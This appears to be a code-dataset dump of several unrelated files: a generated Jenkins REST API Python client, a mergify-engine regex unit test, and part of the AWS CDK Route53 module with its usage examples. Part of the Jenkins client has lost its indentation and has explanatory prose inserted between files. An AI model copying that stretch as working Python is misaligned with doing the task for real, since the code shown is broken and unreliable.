            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_enable(self, name, **kwargs):  # noqa: E501
        """post_job_enable  # noqa: E501

        Enable a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_enable(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_enable_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_enable_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_job_enable_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_job_enable  # noqa: E501

        Enable a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_enable_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_enable" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_enable`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/enable', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_last_build_stop(self, name, **kwargs):  # noqa: E501
        """post_job_last_build_stop  # noqa: E501

        Stop a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_last_build_stop(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_last_build_stop_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_last_build_stop_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_job_last_build_stop_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_job_last_build_stop  # noqa: E501

        Stop a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_last_build_stop_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_last_build_stop" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_last_build_stop`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/lastBuild/stop', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def post_view_config(self, name, body, **kwargs): # noqa: E501
"""post_view_config # noqa: E501
Update view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_view_config(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:param str body: View configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_view_config_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.post_view_config_with_http_info(name, body, **kwargs) # noqa: E501
return data
def post_view_config_with_http_info(self, name, body, **kwargs): # noqa: E501
"""post_view_config # noqa: E501
Update view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_view_config_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:param str body: View configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'body', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_view_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_view_config`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_view_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/view/{name}/config.xml', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
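Every generated `*_with_http_info` method above repeats the same validation pattern: snapshot `locals()`, merge `**kwargs` against an allow-list, then check required parameters before building the request headers. A standalone sketch of that pattern (the function name and return value here are illustrative, not part of the generated client):

```python
def stop_last_build(name=None, **kwargs):
    # Snapshot the arguments, exactly as the generated methods do.
    local_var_params = locals()

    # Allow-list of accepted keyword arguments.
    all_params = ['name', 'jenkins_crumb', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']

    # Reject unknown kwargs, then fold the known ones into the snapshot.
    for key, val in local_var_params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method stop_last_build" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Verify the required parameter 'name' is set.
    if local_var_params.get('name') is None:
        raise ValueError(
            "Missing the required parameter `name` when calling `stop_last_build`")

    # Build the optional CSRF header the same way the client does.
    header_params = {}
    if 'jenkins_crumb' in local_var_params:
        header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']
    return header_params
```

The `locals()` snapshot is what lets the generated code treat positional and keyword arguments uniformly when assembling the request.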
mergify_engine/tests/unit/test_misc.py | Madhu-1/mergify-engine | Apache-2.0

from mergify_engine import SINGLE_PULL_API_RE


def test_simple_pull_re():
    assert not SINGLE_PULL_API_RE.match("https://foorbar:443/")
    assert not SINGLE_PULL_API_RE.match("https://api.github.com:443/orgs/foobar")
    assert not SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar")
    assert not SINGLE_PULL_API_RE.match(
        "https://api.github.com:443/repos/foo/bar/pulls"
    )
    assert (
        SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar/pulls/1")
        is not None
    )
    assert (
        SINGLE_PULL_API_RE.match("https://api.github.com:443/repos/foo/bar/pulls/123")
        is not None
    )
    assert not SINGLE_PULL_API_RE.match(
        "https://api.github.com:443/repos/foo/bar/pulls/abc"
    )
    assert not SINGLE_PULL_API_RE.match(
        "https://api.github.com:443/repos/foo/bar/pulls/123/commits"
    )
    assert not SINGLE_PULL_API_RE.match(
        "https://api.github.com:443/repos/foo/bar/pulls/123/commits/1"
    )
.env/lib/python3.8/site-packages/aws_cdk/aws_route53/__init__.py | careck/begariver-cdk | MIT
# Amazon Route53 Construct Library
<!--BEGIN STABILITY BANNER-->---

![cfn-resources: Stable](https://img.shields.io/badge/cfn--resources-stable-success.svg?style=for-the-badge)

![cdk-constructs: Stable](https://img.shields.io/badge/cdk--constructs-stable-success.svg?style=for-the-badge)

---
<!--END STABILITY BANNER-->
To add a public hosted zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.PublicHostedZone(self, "HostedZone",
zone_name="fully.qualified.domain.com"
)
```
To add a private hosted zone, use `PrivateHostedZone`. Note that
`enableDnsHostnames` and `enableDnsSupport` must have been enabled for the
VPC you're configuring for private hosted zones.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_route53 as route53
vpc = ec2.Vpc(self, "VPC")
zone = route53.PrivateHostedZone(self, "HostedZone",
zone_name="fully.qualified.domain.com",
vpc=vpc
)
```
Additional VPCs can be added with `zone.addVpc()`.
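Like the other snippets here, the following is an uncompiled illustration; it assumes a second VPC (`vpc2`) has already been defined:

```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
zone.add_vpc(vpc2)
```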
## Adding Records
To add a TXT record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.TxtRecord(self, "TXTRecord",
zone=my_zone,
record_name="_foo", # If the name ends with a ".", it will be used as-is;
# if it ends with a "." followed by the zone name, a trailing "." will be added automatically;
# otherwise, a ".", the zone name, and a trailing "." will be added automatically.
# Defaults to zone root if not specified.
values=["Bar!", "Baz?"],
ttl=Duration.minutes(90)
)
```
To add an NS record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.NsRecord(self, "NSRecord",
zone=my_zone,
record_name="foo",
values=["ns-1.awsdns.co.uk.", "ns-2.awsdns.com."
],
ttl=Duration.minutes(90)
)
```
To add a DS record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.DsRecord(self, "DSRecord",
zone=my_zone,
record_name="foo",
values=["12345 3 1 123456789abcdef67890123456789abcdef67890"
],
ttl=Duration.minutes(90)
)
```
To add an A record to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
route53.ARecord(self, "ARecord",
zone=my_zone,
target=route53.RecordTarget.from_ip_addresses("1.2.3.4", "5.6.7.8")
)
```
To add an A record for an EC2 instance with an Elastic IP (EIP) to your zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_route53 as route53
instance = ec2.Instance(self, "Instance", {})
elastic_ip = ec2.CfnEIP(self, "EIP",
domain="vpc",
instance_id=instance.instance_id
)
route53.ARecord(self, "ARecord",
zone=my_zone,
target=route53.RecordTarget.from_ip_addresses(elastic_ip.ref)
)
```
To add an AAAA record pointing to a CloudFront distribution:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
import aws_cdk.aws_route53_targets as targets
route53.AaaaRecord(self, "Alias",
zone=my_zone,
target=route53.RecordTarget.from_alias(targets.CloudFrontTarget(distribution))
)
```
Constructs are available for A, AAAA, CAA, CNAME, MX, NS, SRV and TXT records.
Use the `CaaAmazonRecord` construct to easily restrict certificate authorities
allowed to issue certificates for a domain to Amazon only.
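For example (uncompiled, in the same style as the snippets above, reusing the `my_zone` variable from the earlier examples):

```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53

route53.CaaAmazonRecord(self, "AmazonCAA",
    zone=my_zone
)
```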
To add an NS record to a HostedZone in a different account, you can do the following:
In the account containing the parent hosted zone:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_route53 as route53
parent_zone = route53.PublicHostedZone(self, "HostedZone",
zone_name="someexample.com",
cross_account_zone_delegation_principal=iam.AccountPrincipal("12345678901"),
cross_account_zone_delegation_role_name="MyDelegationRole"
)
```
In the account containing the child zone to be delegated:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
import aws_cdk.aws_iam as iam
import aws_cdk.aws_route53 as route53
sub_zone = route53.PublicHostedZone(self, "SubZone",
zone_name="sub.someexample.com"
)
# import the delegation role by constructing the roleArn
delegation_role_arn = Stack.of(self).format_arn(
region="", # IAM is global in each partition
service="iam",
account="parent-account-id",
resource="role",
resource_name="MyDelegationRole"
)
delegation_role = iam.Role.from_role_arn(self, "DelegationRole", delegation_role_arn)
# create the record
route53.CrossAccountZoneDelegationRecord(self, "delegate",
delegated_zone=sub_zone,
parent_hosted_zone_name="someexample.com", # or you can use parentHostedZoneId
delegation_role=delegation_role
)
```
## Imports
If you don't know the ID of the Hosted Zone to import, you can use the
`HostedZone.fromLookup`:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
HostedZone.from_lookup(self, "MyZone",
domain_name="example.com"
)
```
`HostedZone.fromLookup` requires an environment to be configured. Check
out the [documentation](https://docs.aws.amazon.com/cdk/latest/guide/environments.html) for more details and examples. CDK
automatically looks into your `~/.aws/config` file for the `[default]` profile.
If you want to specify a different account, run `cdk deploy --profile [profile]`.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
MyDevStack(app, "dev",
env={
"account": process.env.CDK_DEFAULT_ACCOUNT,
"region": process.env.CDK_DEFAULT_REGION
}
)
```
If you know the ID and Name of a Hosted Zone, you can import it directly:
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
zone = HostedZone.from_hosted_zone_attributes(self, "MyZone",
zone_name="example.com",
hosted_zone_id="ZOJJZC49E0EPZ"
)
```
Alternatively, use the `HostedZone.fromHostedZoneId` to import hosted zones if
you know the ID and the retrieval for the `zoneName` is undesirable.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
zone = HostedZone.from_hosted_zone_id(self, "MyZone", "ZOJJZC49E0EPZ")
```
## VPC Endpoint Service Private DNS
When you create a VPC endpoint service, AWS generates endpoint-specific DNS hostnames that consumers use to communicate with the service.
For example, vpce-1234-abcdev-us-east-1.vpce-svc-123345.us-east-1.vpce.amazonaws.com.
By default, your consumers access the service with that DNS name.
This can cause problems with HTTPS traffic because the DNS will not match the backend certificate:
```console
curl: (60) SSL: no alternative certificate subject name matches target host name 'vpce-abcdefghijklmnopq-rstuvwx.vpce-svc-abcdefghijklmnopq.us-east-1.vpce.amazonaws.com'
```
Effectively, the endpoint appears untrustworthy. To mitigate this, clients have to create an alias for this DNS name in Route53.
Private DNS for an endpoint service lets you configure a private DNS name so consumers can
access the service using an existing DNS name without creating this Route53 DNS alias.
This DNS name can also be guaranteed to match up with the backend certificate.
Before consumers can use the private DNS name, you must verify that you have control of the domain/subdomain.
Assuming your account has ownership of the particular domain/subdomain,
this construct sets up the private DNS configuration on the endpoint service,
creates all the necessary Route53 entries, and verifies domain ownership.
```python
# Example automatically generated without compilation. See https://github.com/aws/jsii/issues/826
from aws_cdk.core import Stack
from aws_cdk.aws_ec2 import Vpc, VpcEndpointService
from aws_cdk.aws_elasticloadbalancingv2 import NetworkLoadBalancer
from aws_cdk.aws_route53 import PublicHostedZone
stack = Stack()
vpc = Vpc(stack, "VPC")
nlb = NetworkLoadBalancer(stack, "NLB",
vpc=vpc
)
vpces = VpcEndpointService(stack, "VPCES",
vpc_endpoint_service_load_balancers=[nlb]
)
# You must use a public hosted zone so domain ownership can be verified
zone = PublicHostedZone(stack, "PHZ",
zone_name="aws-cdk.dev"
)
VpcEndpointServiceDomainName(stack, "EndpointDomain",
endpoint_service=vpces,
domain_name="my-stuff.aws-cdk.dev",
public_hosted_zone=zone
)
```
'''
import abc
import builtins
import datetime
import enum
import typing

import jsii
import publication
import typing_extensions

from ._jsii import *

import aws_cdk.aws_ec2
import aws_cdk.aws_iam
import aws_cdk.core
import constructs
@jsii.data_type(
    jsii_type="@aws-cdk/aws-route53.AliasRecordTargetConfig",
    jsii_struct_bases=[],
    name_mapping={"dns_name": "dnsName", "hosted_zone_id": "hostedZoneId"},
)
class AliasRecordTargetConfig:
    def __init__(self, *, dns_name: builtins.str, hosted_zone_id: builtins.str) -> None:
        '''Represents the properties of an alias target destination.

        :param dns_name: DNS name of the target.
        :param hosted_zone_id: Hosted zone ID of the target.
        '''
        self._values: typing.Dict[str, typing.Any] = {
            "dns_name": dns_name,
            "hosted_zone_id": hosted_zone_id,
        }

    @builtins.property
    def dns_name(self) -> builtins.str:
        '''DNS name of the target.'''
        result = self._values.get("dns_name")
        assert result is not None, "Required property 'dns_name' is missing"
        return typing.cast(builtins.str, result)

    @builtins.property
    def hosted_zone_id(self) -> builtins.str:
        '''Hosted zone ID of the target.'''
        result = self._values.get("hosted_zone_id")
        assert result is not None, "Required property 'hosted_zone_id' is missing"
        return typing.cast(builtins.str, result)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        return not (rhs == self)

    def __repr__(self) -> str:
        return "AliasRecordTargetConfig(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
@jsii.data_type(
    jsii_type="@aws-cdk/aws-route53.CaaRecordValue",
    jsii_struct_bases=[],
    name_mapping={"flag": "flag", "tag": "tag", "value": "value"},
)
class CaaRecordValue:
    def __init__(
        self,
        *,
        flag: jsii.Number,
        tag: "CaaTag",
        value: builtins.str,
    ) -> None:
        '''Properties for a CAA record value.

        :param flag: The flag.
        :param tag: The tag.
        :param value: The value associated with the tag.
        '''
        self._values: typing.Dict[str, typing.Any] = {
            "flag": flag,
            "tag": tag,
            "value": value,
        }

    @builtins.property
    def flag(self) -> jsii.Number:
        '''The flag.'''
        result = self._values.get("flag")
        assert result is not None, "Required property 'flag' is missing"
        return typing.cast(jsii.Number, result)

    @builtins.property
    def tag(self) -> "CaaTag":
        '''The tag.'''
        result = self._values.get("tag")
        assert result is not None, "Required property 'tag' is missing"
        return typing.cast("CaaTag", result)

    @builtins.property
    def value(self) -> builtins.str:
        '''The value associated with the tag.'''
        result = self._values.get("value")
        assert result is not None, "Required property 'value' is missing"
        return typing.cast(builtins.str, result)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        return not (rhs == self)

    def __repr__(self) -> str:
        return "CaaRecordValue(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
@jsii.enum(jsii_type="@aws-cdk/aws-route53.CaaTag")
class CaaTag(enum.Enum):
    '''The CAA tag.'''

    ISSUE = "ISSUE"
    '''Explicitly authorizes a single certificate authority to issue a certificate (any type) for the hostname.'''
    ISSUEWILD = "ISSUEWILD"
    '''Explicitly authorizes a single certificate authority to issue a wildcard certificate (and only wildcard) for the hostname.'''
    IODEF = "IODEF"
    '''Specifies a URL to which a certificate authority may report policy violations.'''
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDNSSEC(
    aws_cdk.core.CfnResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@aws-cdk/aws-route53.CfnDNSSEC",
):
    '''A CloudFormation ``AWS::Route53::DNSSEC``.

    :cloudformationResource: AWS::Route53::DNSSEC
    :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html
    '''

    def __init__(
        self,
        scope: aws_cdk.core.Construct,
        id: builtins.str,
        *,
        hosted_zone_id: builtins.str,
    ) -> None:
        '''Create a new ``AWS::Route53::DNSSEC``.

        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param hosted_zone_id: ``AWS::Route53::DNSSEC.HostedZoneId``.
        '''
        props = CfnDNSSECProps(hosted_zone_id=hosted_zone_id)

        jsii.create(CfnDNSSEC, self, [scope, id, props])

    @jsii.member(jsii_name="inspect")
    def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
        '''Examines the CloudFormation resource and discloses attributes.

        :param inspector: - tree inspector to collect and process attributes.
        '''
        return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))

    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''
        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))

    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
    def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The CloudFormation resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="cfnProperties")
    def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="hostedZoneId")
    def hosted_zone_id(self) -> builtins.str:
        '''``AWS::Route53::DNSSEC.HostedZoneId``.

        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html#cfn-route53-dnssec-hostedzoneid
        '''
        return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))

    @hosted_zone_id.setter
    def hosted_zone_id(self, value: builtins.str) -> None:
        jsii.set(self, "hostedZoneId", value)
@jsii.data_type(
    jsii_type="@aws-cdk/aws-route53.CfnDNSSECProps",
    jsii_struct_bases=[],
    name_mapping={"hosted_zone_id": "hostedZoneId"},
)
class CfnDNSSECProps:
    def __init__(self, *, hosted_zone_id: builtins.str) -> None:
        '''Properties for defining a ``AWS::Route53::DNSSEC``.

        :param hosted_zone_id: ``AWS::Route53::DNSSEC.HostedZoneId``.

        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html
        '''
        self._values: typing.Dict[str, typing.Any] = {
            "hosted_zone_id": hosted_zone_id,
        }

    @builtins.property
    def hosted_zone_id(self) -> builtins.str:
        '''``AWS::Route53::DNSSEC.HostedZoneId``.

        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html#cfn-route53-dnssec-hostedzoneid
        '''
        result = self._values.get("hosted_zone_id")
        assert result is not None, "Required property 'hosted_zone_id' is missing"
        return typing.cast(builtins.str, result)

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        return not (rhs == self)

    def __repr__(self) -> str:
        return "CfnDNSSECProps(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
@jsii.implements(aws_cdk.core.IInspectable)
class CfnHealthCheck(
    aws_cdk.core.CfnResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@aws-cdk/aws-route53.CfnHealthCheck",
):
    '''A CloudFormation ``AWS::Route53::HealthCheck``.

    :cloudformationResource: AWS::Route53::HealthCheck
    :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html
    '''

    def __init__(
        self,
        scope: aws_cdk.core.Construct,
        id: builtins.str,
        *,
        health_check_config: typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable],
        health_check_tags: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]] = None,
    ) -> None:
        '''Create a new ``AWS::Route53::HealthCheck``.

        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param health_check_config: ``AWS::Route53::HealthCheck.HealthCheckConfig``.
        :param health_check_tags: ``AWS::Route53::HealthCheck.HealthCheckTags``.
        '''
        props = CfnHealthCheckProps(
            health_check_config=health_check_config,
            health_check_tags=health_check_tags,
        )

        jsii.create(CfnHealthCheck, self, [scope, id, props])

    @jsii.member(jsii_name="inspect")
    def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
        '''Examines the CloudFormation resource and discloses attributes.

        :param inspector: - tree inspector to collect and process attributes.
        '''
        return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))

    @jsii.member(jsii_name="renderProperties")
    def _render_properties(
        self,
        props: typing.Mapping[builtins.str, typing.Any],
    ) -> typing.Mapping[builtins.str, typing.Any]:
        '''
        :param props: -
        '''
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))

    @jsii.python.classproperty # type: ignore[misc]
    @jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
    def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
        '''The CloudFormation resource type name for this resource class.'''
        return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="attrHealthCheckId")
    def attr_health_check_id(self) -> builtins.str:
        '''
        :cloudformationAttribute: HealthCheckId
        '''
        return typing.cast(builtins.str, jsii.get(self, "attrHealthCheckId"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="cfnProperties")
    def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="healthCheckConfig")
    def health_check_config(
        self,
    ) -> typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable]:
        '''``AWS::Route53::HealthCheck.HealthCheckConfig``.

        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthcheckconfig
        '''
        return typing.cast(typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable], jsii.get(self, "healthCheckConfig"))

    @health_check_config.setter
    def health_check_config(
        self,
        value: typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable],
    ) -> None:
        jsii.set(self, "healthCheckConfig", value)

    @builtins.property # type: ignore[misc]
    @jsii.member(jsii_name="healthCheckTags")
    def health_check_tags(
        self,
    ) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]]:
        '''``AWS::Route53::HealthCheck.HealthCheckTags``.

        :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthchecktags
        '''
